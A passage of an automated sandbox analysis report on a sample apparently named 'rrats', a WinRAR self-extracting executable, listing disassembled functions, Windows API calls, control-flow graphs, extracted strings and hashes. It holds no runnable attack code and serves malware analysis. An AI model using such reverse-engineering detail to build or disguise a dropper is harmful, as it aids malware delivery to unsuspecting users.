                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CBBC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CBBC6F
                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00CBBCA5
                                                              • Sleep.KERNEL32(00000064), ref: 00CBBCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CBBCE2
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CBBCEB
                                                              • _swprintf.LIBCMT ref: 00CBBD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,00CD35F4), ref: 00CBBD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBBD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBBDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CBBDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBE68
                                                              • _wcslen.LIBCMT ref: 00CBBEBE
                                                              • _swprintf.LIBCMT ref: 00CBBEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBBF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CBBF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBBF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CBBF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBBF85
                                                              • SetWindowTextW.USER32(00000000,00CEA472), ref: 00CBBFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CBC007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CBC0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00CBC197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CBC1D9
                                                                • Part of subcall function 00CBC73F: __EH_prolog.LIBCMT ref: 00CBC744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                              • API String ID: 2472041962-311033401
                                                              • Opcode ID: 1207c14032c5bcc41516b82e1961b994e1c153c7b4c9aed21a33a4bb8185ddcb
                                                              • Instruction ID: 58acf8636aab97359d517737fcdfb19e305b51ced1f4daab384fd97a2fdc5da4
                                                              • Opcode Fuzzy Hash: 1207c14032c5bcc41516b82e1961b994e1c153c7b4c9aed21a33a4bb8185ddcb
                                                              • Instruction Fuzzy Hash: E142E670944399BEEB219BB09C8AFFE7B7CAB01700F040055F655E61E2CBB49E45DB62
                                                              Function 00CB0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 267 cb0863-cb0886 call cbec50 GetModuleHandleW 270 cb0888-cb089f GetProcAddress 267->270 271 cb08e7-cb0b48 267->271 274 cb08b9-cb08c9 GetProcAddress 270->274 275 cb08a1-cb08b7 270->275 272 cb0b4e-cb0b59 call cc75fb 271->272 273 cb0c14-cb0c40 GetModuleFileNameW call cac29a call cb0602 271->273 272->273 285 cb0b5f-cb0b8d GetModuleFileNameW CreateFileW 272->285 290 cb0c42-cb0c4e call cab146 273->290 276 cb08cb-cb08e0 274->276 277 cb08e5 274->277 275->274 276->277 277->271 287 cb0c08-cb0c0f CloseHandle 285->287 288 cb0b8f-cb0b9b SetFilePointer 285->288 287->273 288->287 291 cb0b9d-cb0bb9 ReadFile 288->291 297 cb0c7d-cb0ca4 call cac310 GetFileAttributesW 290->297 298 cb0c50-cb0c5b call cb081b 290->298 291->287 293 cb0bbb-cb0be0 291->293 295 cb0bfd-cb0c06 call cb0371 293->295 295->287 303 cb0be2-cb0bfc call cb081b 295->303 306 cb0cae 297->306 307 cb0ca6-cb0caa 297->307 298->297 305 cb0c5d-cb0c7b CompareStringW 298->305 303->295 305->297 305->307 311 cb0cb0-cb0cb5 306->311 307->290 310 cb0cac 307->310 310->311 312 cb0cec-cb0cee 311->312 313 cb0cb7 311->313 314 cb0dfb-cb0e05 312->314 315 cb0cf4-cb0d0b call cac2e4 call cab146 312->315 316 cb0cb9-cb0ce0 call cac310 GetFileAttributesW 313->316 326 cb0d0d-cb0d6e call cb081b * 2 call cae617 call ca4092 call cae617 call cba7e4 315->326 327 cb0d73-cb0da6 call ca4092 AllocConsole 315->327 322 cb0cea 316->322 323 cb0ce2-cb0ce6 316->323 322->312 323->316 325 cb0ce8 323->325 325->312 333 cb0df3-cb0df5 ExitProcess 326->333 332 cb0da8-cb0ded GetCurrentProcessId AttachConsole call cc3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->332 327->333 332->333
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB0B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB0B93
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00CD3C7C,00000000), ref: 00CB0BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CB0C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CD3C7C,?,00000000,?,00000800), ref: 00CB0C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,00CD3C7C,00000800,?,00000000,?,00000800), ref: 00CB0C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,00CD3D44,00000800), ref: 00CB0CD8
                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              • _swprintf.LIBCMT ref: 00CB0D4A
                                                              • _swprintf.LIBCMT ref: 00CB0D96
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • AllocConsole.KERNEL32 ref: 00CB0D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00CB0DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00CB0DAF
                                                              • _wcslen.LIBCMT ref: 00CB0DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CB0DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00CB0DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00CB0DE7
                                                              • FreeConsole.KERNEL32 ref: 00CB0DED
                                                              • ExitProcess.KERNEL32 ref: 00CB0DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 1207345701-3298887752
                                                              • Opcode ID: ca86e1d95daeed03c58bb98b66e307e2bfdc3229d33bca8b6397e19bd333ce40
                                                              • Instruction ID: 0837d853fbedae741bdb9098857ec13a266dc29f47764ac0f82345a9ecbc4401
                                                              • Opcode Fuzzy Hash: ca86e1d95daeed03c58bb98b66e307e2bfdc3229d33bca8b6397e19bd333ce40
                                                              • Instruction Fuzzy Hash: 67D151F10093C5ABDB219F50C849BDFBBE8BB85704F50491EF39996291DBB09648CB63
                                                              Function 00CBC73F Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 428windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 346 cbc73f-cbc757 call cbeb78 call cbec50 351 cbd40d-cbd418 346->351 352 cbc75d-cbc787 call cbb314 346->352 352->351 355 cbc78d-cbc792 352->355 356 cbc793-cbc7a1 355->356 357 cbc7a2-cbc7b7 call cbaf98 356->357 360 cbc7b9 357->360 361 cbc7bb-cbc7d0 call cb1fbb 360->361 364 cbc7dd-cbc7e0 361->364 365 cbc7d2-cbc7d6 361->365 367 cbd3d9-cbd404 call cbb314 364->367 368 cbc7e6 364->368 365->361 366 cbc7d8 365->366 366->367 367->356 379 cbd40a-cbd40c 367->379 369 cbca5f-cbca61 368->369 370 cbc9be-cbc9c0 368->370 371 cbc7ed-cbc7f0 368->371 372 cbca7c-cbca7e 368->372 369->367 374 cbca67-cbca77 SetWindowTextW 369->374 370->367 376 cbc9c6-cbc9d2 370->376 371->367 377 cbc7f6-cbc850 call cba64d call cabdf3 call caa544 call caa67e call ca6edb 371->377 372->367 375 cbca84-cbca8b 372->375 374->367 375->367 380 cbca91-cbcaaa 375->380 381 cbc9e6-cbc9eb 376->381 382 cbc9d4-cbc9e5 call cc7686 376->382 432 cbc98f-cbc9a4 call caa5d1 377->432 379->351 384 cbcaac 380->384 385 cbcab2-cbcac0 call cc3e13 380->385 388 cbc9ed-cbc9f3 381->388 389 cbc9f5-cbca00 call cbb48e 381->389 382->381 384->385 385->367 401 cbcac6-cbcacf 385->401 393 cbca05-cbca07 388->393 389->393 398 cbca09-cbca10 call cc3e13 393->398 399 cbca12-cbca32 call cc3e13 call cc3e3e 393->399 398->399 420 cbca4b-cbca4d 399->420 421 cbca34-cbca3b 399->421 406 cbcaf8-cbcafb 401->406 407 cbcad1-cbcad5 401->407 410 cbcb01-cbcb04 406->410 413 cbcbe0-cbcbee call cb0602 406->413 407->410 411 cbcad7-cbcadf 407->411 414 cbcb11-cbcb2c 410->414 415 cbcb06-cbcb0b 410->415 411->367 418 cbcae5-cbcaf3 call cb0602 411->418 430 cbcbf0-cbcc04 call cc279b 413->430 433 cbcb2e-cbcb68 414->433 434 cbcb76-cbcb7d 414->434 415->413 415->414 418->430 420->367 429 cbca53-cbca5a call cc3e2e 420->429 427 cbca3d-cbca3f 421->427 428 cbca42-cbca4a call cc7686 421->428 427->428 428->420 429->367 448 cbcc11-cbcc62 call cb0602 call cbb1be GetDlgItem SetWindowTextW SendMessageW call cc3e49 430->448 449 cbcc06-cbcc0a 430->449 450 cbc9aa-cbc9b9 call caa55a 432->450 451 cbc855-cbc869 SetFileAttributesW 432->451 469 cbcb6a 433->469 470 cbcb6c-cbcb6e 433->470 439 cbcbab-cbcbce call cc3e13 * 2 434->439 440 cbcb7f-cbcb97 call cc3e13 434->440 439->430 474 cbcbd0-cbcbde call cb05da 439->474 440->439 462 cbcb99-cbcba6 call cb05da 440->462 480 cbcc67-cbcc6b 448->480 449->448 452 cbcc0c-cbcc0e 449->452 450->367 457 cbc90f-cbc91f GetFileAttributesW 451->457 458 cbc86f-cbc8a2 call cab991 call cab690 call cc3e13 451->458 452->448 457->432 467 cbc921-cbc930 DeleteFileW 457->467 489 cbc8b5-cbc8c3 call cabdb4 458->489 490 cbc8a4-cbc8b3 call cc3e13 458->490 462->439 467->432 473 cbc932-cbc935 467->473 469->470 470->434 477 cbc939-cbc965 call ca4092 GetFileAttributesW 473->477 474->430 487 cbc937-cbc938 477->487 488 cbc967-cbc97d MoveFileW 477->488 480->367 484 cbcc71-cbcc85 SendMessageW 480->484 484->367 487->477 488->432 491 cbc97f-cbc989 MoveFileExW 488->491 489->450 496 cbc8c9-cbc909 call cc3e13 call cbfff0 SHFileOperationW 489->496 490->489 490->496 491->432 496->457
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CBC744
                                                                • Part of subcall function 00CBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CBB3FB
                                                              • _wcslen.LIBCMT ref: 00CBCA0A
                                                              • _wcslen.LIBCMT ref: 00CBCA13
                                                              • SetWindowTextW.USER32(?,?), ref: 00CBCA71
                                                              • _wcslen.LIBCMT ref: 00CBCAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CBCBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBCC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CBCC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,00CEA472), ref: 00CBCC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CBCC7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 2804936435-312220925
                                                              • Opcode ID: eb83b4ffa16be7f84318d728fdd88977d604f3f67f54e04e68e255ab73a86820
                                                              • Instruction ID: 99991f081c396ea5f5c39c5bf91783011645443057f5cbca505dfc2e25d467af
                                                              • Opcode Fuzzy Hash: eb83b4ffa16be7f84318d728fdd88977d604f3f67f54e04e68e255ab73a86820
                                                              • Instruction Fuzzy Hash: 7EE163B2900259AADF24DBA0DC85EEE73BCAB04350F4040AAF619E7151EF749F44DF61
                                                              Function 00CADA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CADA70
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CADAAC
                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046A), ref: 00CB1BA0
                                                              • _wcslen.LIBCMT ref: 00CADDE9
                                                              • __fprintf_l.LIBCMT ref: 00CADF1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                              • API String ID: 566448164-801612888
                                                              • Opcode ID: d835d144b64078ce8faf850e88248a4f94c4340b87f306fa0ea715fa92083267
                                                              • Instruction ID: 6d56771bd560053d599df51ece3dc9d08da540f73b5aaeae0e59d90d1d6c32d3
                                                              • Opcode Fuzzy Hash: d835d144b64078ce8faf850e88248a4f94c4340b87f306fa0ea715fa92083267
                                                              • Instruction Fuzzy Hash: AA32047190021A9BCF24EF68CC41BEE77A4FF06708F40456AFA1697291E7B1DE85DB90
                                                              Function 00CBD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              • GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                              • Instruction ID: c39e62f4638d847c33ca38c41e0333dbb4e60431581dc3b1e2302ce7c6d92fc2
                                                              • Opcode Fuzzy Hash: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                              • Instruction Fuzzy Hash: E431CF71146346AFE311DF21AC4AFAB7FACEB86704F000518F655D62E0EB748A0887B6
                                                              Function 00CBD78F Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 835 cbd78f-cbd7a7 call cbec50 838 cbd9e8-cbd9f0 835->838 839 cbd7ad-cbd7b9 call cc3e13 835->839 839->838 842 cbd7bf-cbd7e7 call cbfff0 839->842 845 cbd7e9 842->845 846 cbd7f1-cbd7ff 842->846 845->846 847 cbd812-cbd818 846->847 848 cbd801-cbd804 846->848 850 cbd85b-cbd85e 847->850 849 cbd808-cbd80e 848->849 852 cbd810 849->852 853 cbd837-cbd844 849->853 850->849 851 cbd860-cbd866 850->851 854 cbd868-cbd86b 851->854 855 cbd86d-cbd86f 851->855 856 cbd822-cbd82c 852->856 857 cbd84a-cbd84e 853->857 858 cbd9c0-cbd9c2 853->858 854->855 859 cbd882-cbd898 call cab92d 854->859 855->859 860 cbd871-cbd878 855->860 861 cbd81a-cbd820 856->861 862 cbd82e 856->862 863 cbd9c6 857->863 864 cbd854-cbd859 857->864 858->863 870 cbd89a-cbd8a7 call cb1fbb 859->870 871 cbd8b1-cbd8bc call caa231 859->871 860->859 865 cbd87a 860->865 861->856 867 cbd830-cbd833 861->867 862->853 869 cbd9cf 863->869 864->850 865->859 867->853 872 cbd9d6-cbd9d8 869->872 870->871 880 cbd8a9 870->880 881 cbd8d9-cbd8e6 ShellExecuteExW 871->881 882 cbd8be-cbd8d5 call cab6c4 871->882 875 cbd9da-cbd9dc 872->875 876 cbd9e7 872->876 875->876 879 cbd9de-cbd9e1 ShowWindow 875->879 876->838 879->876 880->871 881->876 884 cbd8ec-cbd8f9 881->884 882->881 886 cbd8fb-cbd902 884->886 887 cbd90c-cbd90e 884->887 886->887 888 cbd904-cbd90a 886->888 889 cbd910-cbd919 IsWindowVisible 887->889 890 cbd925-cbd938 WaitForInputIdle call cbdc3b 887->890 888->887 891 cbd97b-cbd987 CloseHandle 888->891 889->890 892 cbd91b-cbd923 ShowWindow 889->892 896 cbd93d-cbd944 890->896 894 cbd989-cbd996 call cb1fbb 891->894 895 cbd998-cbd9a6 891->895 892->890 894->869 894->895 895->872 898 cbd9a8-cbd9aa 895->898 896->891 899 cbd946-cbd94e 896->899 898->872 901 cbd9ac-cbd9b2 898->901 899->891 902 cbd950-cbd961 GetExitCodeProcess 899->902 901->872 903 cbd9b4-cbd9be 901->903 902->891 904 cbd963-cbd96d 902->904 903->872 905 cbd96f 904->905 906 cbd974 904->906 905->906 906->891
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CBD7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 00CBD8DE
                                                              • IsWindowVisible.USER32(?), ref: 00CBD911
                                                              • ShowWindow.USER32(?,00000000), ref: 00CBD91D
                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00CBD92E
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00CBD959
                                                              • CloseHandle.KERNEL32(?), ref: 00CBD97F
                                                              • ShowWindow.USER32(?,00000001), ref: 00CBD9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                              • String ID: .exe$.inf
                                                              • API String ID: 3646668279-3750412487
                                                              • Opcode ID: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                              • Instruction ID: de231151d2098269ee19c3552789dd4b7849f569190ee5e6e3fe0afeb951738c
                                                              • Opcode Fuzzy Hash: c47b8dcf54fc1a16f3028ab6d6364f3ad7111c977cb84311a936115c4bf3b5be
                                                              • Instruction Fuzzy Hash: 9B51E5708043809ADB309F64A844BFB7BE4AF46744F04041EF5D6972A1FB728F85DB52
                                                              Function 00CCA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 907 cca95b-cca974 908 cca98a-cca98f 907->908 909 cca976-cca986 call ccef4c 907->909 911 cca99c-cca9c0 MultiByteToWideChar 908->911 912 cca991-cca999 908->912 909->908 919 cca988 909->919 913 cca9c6-cca9d2 911->913 914 ccab53-ccab66 call cbfbbc 911->914 912->911 916 cca9d4-cca9e5 913->916 917 ccaa26 913->917 920 ccaa04-ccaa15 call cc8e06 916->920 921 cca9e7-cca9f6 call cd2010 916->921 923 ccaa28-ccaa2a 917->923 919->908 926 ccab48 920->926 935 ccaa1b 920->935 921->926 934 cca9fc-ccaa02 921->934 923->926 927 ccaa30-ccaa43 MultiByteToWideChar 923->927 928 ccab4a-ccab51 call ccabc3 926->928 927->926 931 ccaa49-ccaa5b call ccaf6c 927->931 928->914 936 ccaa60-ccaa64 931->936 938 ccaa21-ccaa24 934->938 935->938 936->926 939 ccaa6a-ccaa71 936->939 938->923 940 ccaaab-ccaab7 939->940 941 ccaa73-ccaa78 939->941 943 ccaab9-ccaaca 940->943 944 ccab03 940->944 941->928 942 ccaa7e-ccaa80 941->942 942->926 945 ccaa86-ccaaa0 call ccaf6c 942->945 947 ccaacc-ccaadb call cd2010 943->947 948 ccaae5-ccaaf6 call cc8e06 943->948 946 ccab05-ccab07 944->946 945->928 960 ccaaa6 945->960 951 ccab09-ccab22 call ccaf6c 946->951 952 ccab41-ccab47 call ccabc3 946->952 947->952 963 ccaadd-ccaae3 947->963 948->952 959 ccaaf8 948->959 951->952 965 ccab24-ccab2b 951->965 952->926 964 ccaafe-ccab01 959->964 960->926 963->964 964->946 966 ccab2d-ccab2e 965->966 967 ccab67-ccab6d 965->967 968 ccab2f-ccab3f WideCharToMultiByte 966->968 967->968 968->952 969 ccab6f-ccab76 call ccabc3 968->969 969->928
                                                              APIs
